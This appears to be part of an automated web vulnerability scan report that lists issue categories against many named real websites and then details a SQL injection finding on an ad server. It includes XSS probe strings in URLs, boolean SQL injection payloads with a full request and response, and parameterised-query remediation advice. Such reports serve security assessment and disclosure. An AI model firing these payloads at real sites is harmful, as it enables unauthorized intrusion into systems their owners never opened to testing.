25.52. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314

25.53. http://www.leaseweb.com/js/lsw2/facebox.js

25.54. http://www.leaseweb.com/js/lsw2/jcarousellite_1.0.1.js

25.55. http://www.leaseweb.com/js/lsw2/jquery.cookie.js

25.56. https://www.leaseweb.com/js/lsw2/facebox.js

25.57. https://www.leaseweb.com/js/lsw2/jcarousellite_1.0.1.js

25.58. https://www.leaseweb.com/js/lsw2/jquery.cookie.js

25.59. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

25.60. http://www.longislanderotic.com/longislanderotic/forum/forum_closed.asp

25.61. http://www.mayerbrown.com/careers/index.asp

25.62. http://www.mayerbrown.com/careers/none

25.63. http://www.mayerbrown.com/emergingmarkets/

25.64. http://www.mayerbrown.com/emergingmarkets/none

25.65. http://www.mayerbrown.com/favicon.ico

25.66. http://www.mayerbrown.com/lawyers/none

25.67. http://www.mayerbrown.com/lawyers/profile.asp

25.68. http://www.mayerbrown.com/lawyers/profile.asp

25.69. http://www.mayerbrown.com/london/index.asp

25.70. http://www.mayerbrown.com/mayerbrownjsm/index.asp

25.71. http://www.mayerbrown.com/practice/none

25.72. http://www.mayerbrown.com/practice/practicegroups.asp

25.73. http://www.millerwelds.com/includes/DD_roundies_0.0.2a-min.js

25.74. http://www.ngi.it/F3/

25.75. http://www.ngi.it/F6/

25.76. http://www.ngi.it/corporate/adv.asp

25.77. http://www.ngi.it/f6/index.asp

25.78. http://www.ngi.it/ipass/contatti.asp

25.79. https://www.ngi.it/F3/

25.80. https://www.ngi.it/F6/

25.81. https://www.ngi.it/arAgenti/

25.82. https://www.ngi.it/arDealer/

25.83. https://www.ngi.it/corporate/adv.asp

25.84. https://www.ngi.it/gwHW/contatti.asp

25.85. https://www.ngi.it/gwHW/faq.asp

25.86. https://www.ngi.it/gwHW/resi.asp

25.87. http://www.nike.com/nikeos/global/js/jquery.cookie.js

25.88. http://www.nike.com/nikeos/global/js/jquery.dimensions.pack.js

25.89. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js

25.90. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress

25.91. http://www.powerblockswag.com/

25.92. http://www.powerblockswag.com/11_Xtreme_4x4_Skull_Tee_Charcoal_p/xt-07.htm

25.93. http://www.powerblockswag.com/ShoppingCart.asp

25.94. https://www.powerblockswag.com/login.asp

25.95. http://www.powerblocktv.com/site3/media/system/js/caption.js

25.96. http://www.powerblocktv.com/site3/plugins/system/rokbox/rokbox.js

25.97. http://www.powerblocktv.com/site3/templates/rt_hyperion_j15/js/rokmenuslide.js

25.98. http://www.powerblocktv.com/site3/templates/rt_hyperion_j15/js/roktop-panel.js

25.99. http://www.rewardsnetwork.com/

25.100. http://www.rewardsnetwork.com/flash/ticker/AC_RunActiveContent.js

25.101. http://www.rockyou.com/checkuser.php

25.102. http://www.rockyou.com/js/lightbox/prototype.js

25.103. http://www.rockyou.com/login.php

25.104. http://www.rockyou.com/privacypolicy.php

25.105. http://www.rockyou.com/rymini/

25.106. http://www.rockyou.com/rymini/index.html

25.107. http://www.rockyou.com/rymini/pdf/playdemic.pdf

25.108. http://www.rockyou.com/tos.php

25.109. https://www.rockyou.com/login/

25.110. https://www.rockyou.com/login/index.php

25.111. http://www.sundiogroup.com/contact.html

25.112. http://www.tmhlo.jp/

25.113. http://www.viglink.com/

25.114. http://www.viglink.com/corp/merchants

25.115. http://www.viglink.com/users/login

25.116. https://www.viglink.com/users/login

25.117. https://www.webmaillive.co.uk/Login.aspx

25.118. https://www.webmaillive.co.uk/Login.aspx/%22ns=%22netsparker(0x00004F)

25.119. http://www.yankeespirits.com/index.php

25.120. http://www.ypg.com/en/contact-us

25.121. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

25.122. http://www.ypg.com/en/images/loading.gif

25.123. http://www.ypg.com/js/jquery/plugins/jquery.cookie.js

25.124. http://xss.cx//examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

25.125. http://xss.cx/examples/dork/lawyers/xss-dork-lawyer-cross-site-scripting-curtiscom.html

25.126. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

25.127. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-dork-leasewebcom.html

25.128. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

25.129. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

25.130. http://xss.cx/examples/dork/xss/xss-dork-msnfoxsportscom-xss-cross-site-scripting.html

25.131. http://xss.cx/examples/netsparker/stored-xss-permanent-www.ngi.it_443.htm

25.132. http://xss.cx/examples/netsparker/www.ypg.com_80.htm

25.133. http://xss.cx/x/b/blekko.com_443.htm

25.134. http://xss.cx/x/b/xss-cross-site-scripting-cwe79-capec86.blekko.com.html

25.135. http://yankeespirits.com/

26. Private IP addresses disclosed

26.1. http://community.martindale.com/groups/groupdirectory.aspx

26.2. http://community.martindale.com/upgrade-your-connected-account.aspx

26.3. http://connect.facebook.net/en_US/all.js

26.4. http://digg.com/submit

26.5. http://digg.com/submit

26.6. http://mochibot.com/mochiSWF

26.7. http://mochibot.com/mochiSWF

26.8. http://mochibot.com/mochiSWF

26.9. http://mochibot.com/my/core.swf

26.10. http://mochibot.com/my/core.swf

26.11. http://mochibot.com/my/core.swf

26.12. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.13. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.14. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.15. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/tzS9q4SS9zy.css

26.16. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/xvZj_SKjjya.js

26.17. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/wFcdvtg8yWA.js

26.18. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

26.19. http://www.facebook.com/extern/login_status.php

26.20. http://www.facebook.com/extern/login_status.php

26.21. http://www.facebook.com/extern/login_status.php

26.22. http://www.facebook.com/extern/login_status.php

26.23. http://www.facebook.com/extern/login_status.php

26.24. http://www.facebook.com/plugins/like.php

26.25. http://www.facebook.com/plugins/like.php

26.26. http://www.facebook.com/plugins/like.php

26.27. http://www.facebook.com/plugins/like.php

26.28. http://www.facebook.com/plugins/likebox.php

26.29. http://www.facebook.com/plugins/likebox.php

26.30. http://www.facebook.com/plugins/likebox.php

26.31. http://www.facebook.com/plugins/likebox.php

26.32. http://www.facebook.com/plugins/likebox.php

26.33. http://www.google.com/sdch/rU20-FBA.dct

26.34. http://www.millerwelds.com/about/images/CorpBldg200.jpg

26.35. http://www.millerwelds.com/about/images/careerbg.gif

26.36. http://www.millerwelds.com/about/images/fake-background.png

26.37. http://www.millerwelds.com/about/images/newsreleasebg.gif

26.38. http://www.millerwelds.com/about/images/ourcompanybg.gif

26.39. http://www.millerwelds.com/about/images/thtabs.gif

26.40. http://www.millerwelds.com/about/images/tradeshowbg.gif

26.41. http://www.millerwelds.com/fabtech/images/blog-icon.gif

26.42. http://www.millerwelds.com/fabtech/images/facebook-icon.gif

26.43. http://www.millerwelds.com/fabtech/images/flickr-icon.gif

26.44. http://www.millerwelds.com/fabtech/images/forum-icon.gif

26.45. http://www.millerwelds.com/fabtech/images/twitter-icon.gif

26.46. http://www.millerwelds.com/fabtech/images/youtube-icon.gif

26.47. http://www.millerwelds.com/favicon.ico

26.48. http://www.millerwelds.com/financing/images/darkhead_min.png

26.49. http://www.millerwelds.com/financing/images/lighthead_min.png

26.50. http://www.millerwelds.com/financing/images/plinenavbody_min.png

26.51. http://www.millerwelds.com/financing/images/plinenavfoot_min.png

26.52. http://www.millerwelds.com/financing/images/plinenavhead_min.png

26.53. http://www.millerwelds.com/financing/images/powerline_bg.png

26.54. http://www.millerwelds.com/financing/images/powerline_head.png

26.55. http://www.millerwelds.com/images/ads/powerLINEad.png

26.56. http://www.millerwelds.com/images/footer-social-sprite.jpg

26.57. http://www.millerwelds.com/images/go-search.jpg

26.58. http://www.millerwelds.com/images/logo_printable.gif

26.59. http://www.millerwelds.com/images/nav-new/aboutus.gif

26.60. http://www.millerwelds.com/images/nav-new/blog.gif

26.61. http://www.millerwelds.com/images/nav-new/forums.gif

26.62. http://www.millerwelds.com/images/nav-new/indust_interests.gif

26.63. http://www.millerwelds.com/images/nav-new/powerclick01.gif

26.64. http://www.millerwelds.com/images/nav-new/products.gif

26.65. http://www.millerwelds.com/images/nav-new/resources.gif

26.66. http://www.millerwelds.com/images/nav-new/service.gif

26.67. http://www.millerwelds.com/images/nav-new/wheretobuy.gif

26.68. http://www.millerwelds.com/images/navicons.png

26.69. http://www.millerwelds.com/images/pdf_icon2.gif

26.70. http://www.millerwelds.com/images/products/accessories/242718.jpg

26.71. http://www.millerwelds.com/images/products/accessories/243786.jpg

26.72. http://www.millerwelds.com/images/products/accessories/245586.jpg

26.73. http://www.millerwelds.com/images/products/accessories/IntCmlkTwcoAdap.jpg

26.74. http://www.millerwelds.com/images/products/mini/ISO9001.jpg

26.75. http://www.millerwelds.com/images/tab-accessories.gif

26.76. http://www.millerwelds.com/images/tab.gif

26.77. http://www.millerwelds.com/interests/projects/ideagallery/images/shareicons.png

26.78. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

26.79. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

26.80. http://www.millerwelds.com/products/accessories/images/cart.jpg

26.81. http://www.millerwelds.com/products/accessories/images/consumables.jpg

26.82. http://www.millerwelds.com/products/accessories/images/covers.jpg

26.83. http://www.millerwelds.com/products/accessories/images/guns.jpg

26.84. http://www.millerwelds.com/products/accessories/images/remote.jpg

26.85. http://www.millerwelds.com/products/accessories/images/safety.jpg

26.86. http://www.millerwelds.com/products/accessories/images/trailers.jpg

26.87. http://www.millerwelds.com/products/accessories/images/whatsnew-color.gif

26.88. http://www.millerwelds.com/products/accessories/images/workstation.jpg

26.89. http://www.millerwelds.com/products/images/compcomp/ltfl.gif

26.90. http://www.millerwelds.com/products/images/compcomp/ltfr.gif

26.91. http://www.millerwelds.com/products/images/compcomp/lthl.gif

26.92. http://www.millerwelds.com/products/images/compcomp/lthr.gif

26.93. http://www.millerwelds.com/products/images/index/tl.gif

26.94. http://www.millerwelds.com/products/images/index/tr.gif

26.95. http://www.millerwelds.com/resources/articles/images/article-bg.gif

26.96. http://www.millerwelds.com/results/blog/wp-content/plugins/ratepost/images/star_redzero16_3.gif

26.97. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints/images/rss.gif

26.98. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints2/images/diy.jpg

26.99. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints2/images/instructor.jpg

26.100. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints2/images/pro.jpg

26.101. http://www.millerwelds.com/results/blog/wp-content/uploads/CONEXPO1.jpg

26.102. http://www.millerwelds.com/results/blog/wp-content/uploads/MFT.jpg

26.103. http://www.millerwelds.com/results/blog/wp-content/uploads/P7319719_WEB1-e1300283842671-300x180.jpg

26.104. http://www.millerwelds.com/results/images/viewpoints-icon.gif

26.105. http://www.millerwelds.com/results/images/viewpoints-search.gif

26.106. http://www.millerwelds.com/results/images/whatisthis.png

26.107. http://www.millerwelds.com/service/images/consumables.jpg

26.108. http://www.millerwelds.com/service/images/locations.gif

26.109. http://www.millerwelds.com/service/images/omparts.gif

26.110. http://www.millerwelds.com/service/images/warranty.gif

26.111. http://www.millerwelds.com/wheretobuy/images/map-left.jpg

26.112. http://www.millerwelds.com/wheretobuy/images/map-right.jpg

26.113. http://www.millerwelds.com/wheretobuy/images/topleft.gif

26.114. http://www.millerwelds.com/wheretobuy/images/topright.gif

26.115. http://www.viglink.com/

26.116. http://www.viglink.com/

26.117. http://www.viglink.com/corp/merchants

26.118. http://www.viglink.com/users/login

26.119. https://www.viglink.com/users/login

26.120. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

26.121. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

27. Credit card numbers disclosed

27.1. http://reedgroup.com/zoom_index.js

27.2. http://www.rockyou.com/rymini/pdf/RockYou_Loot_Drop_Announcement.pdf

27.3. http://www.rockyou.com/rymini/pdf/playdemic.pdf

27.4. http://www.rtmtv.com/files/RTM_2011MediaKit.pdf

28. Robots.txt file

28.1. http://beacon.securestudies.com/scripts/beacon.dll

28.2. http://clients1.google.com/complete/search

28.3. http://reedgroup.com/

29. Cacheable HTTPS response

29.1. https://secure.webwiz.co.uk/clientarea/

29.2. https://secure.webwiz.co.uk/includes/default_javascript.js

29.3. https://www.idine.com/dwr/engine.js

29.4. https://www.leaseweb.com/en/shopping-cart/login

29.5. https://www.ngi.it/gwHw/productPdf/Vigor2700VG.pdf

29.6. https://www.ngi.it/include/swflash.cab

29.7. https://www.powerblockswag.com/login.asp

29.8. https://www.rockyou.com/events/include/ajaxtrackevent.php

29.9. https://www.rockyou.com/login/

29.10. https://www.rockyou.com/login/index.php

29.11. https://www.rockyou.com/resetpassword.php

29.12. https://www.webmaillive.co.uk/Login.aspx

29.13. https://www.webmaillive.co.uk/robots.txt

29.14. https://www.websitepanel.co.uk/Default.aspx

30. HTML does not specify charset

30.1. http://ad.doubleclick.net/adi/N3905.291893.COXDIGITALSOLUTIONS/B5343548

30.2. http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10

30.3. http://apps.io/user-map/IO.php

30.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.5. http://fast.fonts.com/d/319d42fd-bb57-4b3e-9525-344e63551bb0.eot

30.6. http://fast.fonts.com/d/7db71a0d-51ce-421a-9384-439ef35401bf.eot

30.7. http://jqueryui.com/themeroller/

30.8. http://longislanderotic.com/

30.9. http://longislanderotic.com/favicon.ico

30.10. http://nexus.ensighten.com/v2/cg.php

30.11. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.12. http://ping.chartbeat.net/ping

30.13. https://secure.webwiz.co.uk/includes/default_javascript.js

30.14. http://visitordrive.com/evTracker/evtracker.php

30.15. http://visitordrive.com/evTracker/services/keywords.php

30.16. http://www.curtis.com/scripts/DateRange/ipopeng.htm

30.17. http://www.google.com/recaptcha/api/noscript

30.18. http://www.gtlaw.com/ve/res/html/blank.html

30.19. http://www.gtlaw.com/ve/res/html/calendar.htm

30.20. http://www.longislanderotic.com/

30.21. http://www.longislanderotic.com/favicon.ico

30.22. http://www.longislanderotic.com/landing.html

30.23. http://www.longislanderotic.com/sitemap.xml

30.24. http://www.longislanderotic.com/terms.asp

30.25. http://www.mayerbrown.com/lawyers/profile.asp

30.26. https://www.ngi.it/gwHw/basket/

30.27. http://www.socialfollow.com/js/flash-detect.js

30.28. http://www.socialfollow.com/js/jquery.js

30.29. http://www.socialfollow.com/js/thickbox.js

30.30. http://www.socialfollow.com/js/validator.js

30.31. http://www.sundiogroup.com/

30.32. http://www.sundiogroup.com/bedrijf.html

30.33. http://www.sundiogroup.com/contact.html

30.34. http://www.sundiogroup.com/merken.html

30.35. http://www.sundiogroup.com/toerisme.html

30.36. http://www.sundiogroup.com/vacatures.html

30.37. http://xss.cx//examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

30.38. http://xss.cx/examples/dork/cookie/xss-cookie-dork-wwwaolcom.cross-site-scripting.html

30.39. http://xss.cx/examples/dork/lawyers/xss-dork-lawyer-cross-site-scripting-curtiscom.html

30.40. http://xss.cx/examples/dork/ldap/ldap-injection-springframework-example.html

30.41. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

30.42. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-dork-leasewebcom.html

30.43. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-vanityfaircom.html

30.44. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-wwwfoxsportsfloridacom-cwe79.html

30.45. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

30.46. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-humaniplexcom.html

30.47. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

30.48. http://xss.cx/examples/dork/xss/xss-dork-msnfoxsportscom-xss-cross-site-scripting.html

30.49. http://xss.cx/examples/dork/xss/xss-foxsportsarizona.com.cross-site-scripting.html

30.50. http://xss.cx/examples/netsparker/boolean-sql-injection-second-order-sqlinjection-wwwinsideupcom.htm

30.51. http://xss.cx/examples/netsparker/stored-xss-permanent-www.ngi.it_443.htm

30.52. http://xss.cx/examples/netsparker/www.ypg.com_80.htm

30.53. http://xss.cx/x/b/blekko.com_443.htm

30.54. http://xss.cx/x/b/xss-cross-site-scripting-cwe79-capec86.blekko.com.html

31. HTML uses unrecognised charset

31.1. http://www.ohhara-law.jp/

31.2. http://www.surugadai.org/

31.3. http://www.surugadai.org/map/index.html

31.4. http://www.surugadai.org/practice/index.html

31.5. http://www.tmhlo.jp/

31.6. http://www.tmhlo.jp/map.html

31.7. http://www.tmhlo.jp/service/index.html

31.8. http://www.tmhlo.jp/service/service.html

32. Content type incorrectly stated

32.1. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/makeRequest

32.2. http://a.rad.msn.com/ADSAdClient31.dll

32.3. http://a0.twimg.com/profile_images/388323356/falcons_normal.gif

32.4. http://a2.twimg.com/profile_images/409999693/logo_icon_normal.gif

32.5. http://adserver.adtechus.com/addyn/3.0/5124/81106/0/277/ADTECH

32.6. http://api.ning.com/icons/appatar/2170052

32.7. http://apps.io/user-map/IO.php

32.8. http://apps.rockyou.com/

32.9. http://apps.rockyou.com/favicon.ico

32.10. http://apps.rockyou.com/slideshow/readxml.php

32.11. http://apps.rockyou.com/text-undefined.swf

32.12. http://apps.rockyou.com/undefined.swf

32.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.14. http://content.idine.com/z/id/favicon.ico

32.15. http://event.adxpose.com/event.flow

32.16. http://goku.brightcove.com/1pix.gif

32.17. http://i.yimg.jp/images/map/icon/grabber.cur

32.18. http://jqueryjs.googlecode.com/files/jquery-1.3.1.js

32.19. http://jqueryui.com/themeroller/images/themeGallery/theme_90_ui_light.png

32.20. http://longislanderotic.com/

32.21. http://map.yahooapis.jp/MapsService/embedmap/V2/

32.22. http://map.yahooapis.jp/OpenLocalPlatform/V1/jsapi

32.23. http://map.yahooapis.jp/js/embed.js

32.24. http://modules.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

32.25. http://modules.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

32.26. http://nexus.ensighten.com/nike/serverComponent.php

32.27. http://nexus.ensighten.com/v2/cg.php

32.28. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.29. http://operatorchan.org/s/src/s17891_55111805.jpg

32.30. http://rad.msn.com/ADSAdClient31.dll

32.31. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

32.32. https://secure.webwiz.co.uk/includes/default_javascript.js

32.33. http://store.nike.com/nikestore/web/xml/nav/nav_en_US.xml

32.34. http://store.nike.com/nikestore/web/xml/nav/site.xml

32.35. http://store.nike.com/nikestore/web/xml/nav/style.xml

32.36. http://survey.112.2o7.net/survey/dynamic/suites/285/nikeall/list.js

32.37. http://vasco.com/app_pages/getDCP.aspx

32.38. http://verify.authorize.net/anetseal/images/secure90x72.gif

32.39. http://visitordrive.com/evTracker/images/spiffycal.cur

32.40. http://visitordrive.com/evTracker/services/keywords.php

32.41. http://www.aplaw.jp/css/reset.css

32.42. http://www.aplaw.jp/js/common.js

32.43. http://www.essortment.com/favicon.ico'

32.44. http://www.facebook.com/extern/login_status.php

32.45. http://www.faegre.co.uk/jscripts.js

32.46. http://www.google.com/realtimejs

32.47. http://www.google.com/recaptcha/api/reload

32.48. http://www.google.com/search

32.49. http://www.humaniplex.com/favicon.ico

32.50. http://www.idine.com/dwr/engine.js

32.51. https://www.idine.com/dwr/engine.js

32.52. http://www.invisor.net/images/invisor.net/Image/brain2(1).jpg

32.53. http://www.invisor.net/images/invisor.net/Image/coaching(1).jpg

32.54. http://www.invisor.net/images/invisor.net/Image/fish%20strategy(2).jpg

32.55. http://www.invisor.net/images/invisor.net/Image/speaking.jpg

32.56. http://www.jurists.co.jp/common/img/toppage_global-navi_bg_001.png

32.57. http://www.jurists.co.jp/favicon.ico

32.58. http://www.kslaw.com/imageserver/plumtree/portal/private/js/ptwc/3.1/postbacksupport.js

32.59. http://www.longislanderotic.com/

32.60. http://www.mayerbrown.com/images/190max/Button_Dodd-Frank-Act_Info-&-Analysis.gif

32.61. http://www.millerwelds.com/favicon.ico

32.62. http://www.nike.com/global-landing/global/xml/style.xml

32.63. http://www.nike.com/nikegolf/global/resources/xml/nav/nav-style.xml

32.64. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

32.65. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

32.66. http://www.nike.com/nikeos/p/usnikefootball/en_US/utilities/nav

32.67. http://www.noandt.com/css/default.css

32.68. http://www.noandt.com/css/import.css

32.69. http://www.noandt.com/favicon.ico

32.70. http://www.noandt.com/js/link.js

32.71. http://www.rewardsnetwork.com/favicon.ico

32.72. http://www.rockyou.com/ajaxticker.php

32.73. http://www.rockyou.com/checkuser.php

32.74. http://www.rockyou.com/create-slideshow-js-combined.php

32.75. http://www.rockyou.com/events/include/ajaxtrackevent.php

32.76. http://www.rockyou.com/homepage/js/jquery.fancybox-1.3.1/ajax.txt

32.77. http://www.rockyou.com/partner/funmobility-ajax.php

32.78. http://www.rockyou.com/show_my_gallery-ajax.php

32.79. https://www.rockyou.com/events/include/ajaxtrackevent.php

32.80. http://www.rtmtv.com/favicon.ico

32.81. http://www.socialfollow.com/blog/wp-content/uploads/2009/06/logo1.gif

32.82. http://www.socialfollow.com/js/flash-detect.js

32.83. http://www.socialfollow.com/js/jquery.js

32.84. http://www.socialfollow.com/js/thickbox.js

32.85. http://www.socialfollow.com/js/validator.js

32.86. https://www.webmaillive.co.uk/Login.aspx

32.87. http://www.ypg.com/images/imageresizer.php

32.88. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico

32.89. http://www.zoomerang.com/Survey/WEB22BZL8ZUMFQ/Image/Title/none

33. Content type is not specified

33.1. http://newton.newtonsoftware.com/favicon.ico

33.2. http://widgets.digg.com/buttons/count

33.3. http://www.duanemorris.com/favicon.ico

33.4. http://www.duanemorris.com/services



1. SQL injection  next
There are 127 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12883928'%20or%201%3d1--%20 and 12883928'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUlVo69RiZ0jqNPgQ_eE4qd7lFX20AAAtmYASPTEpRhaPmmXNtd4EAAAEvZiQJWw--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:28 GMT; Path=/
Set-Cookie: UA=AAAAAQAUshtdxv8Nep7WiQfS0VXCFGEDCiEDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FMxrIBgPf1fUglQwsIYwgCiwZA5ECACQyB7o-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2985
Date: Mon, 18 Apr 2011 01:05:27 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
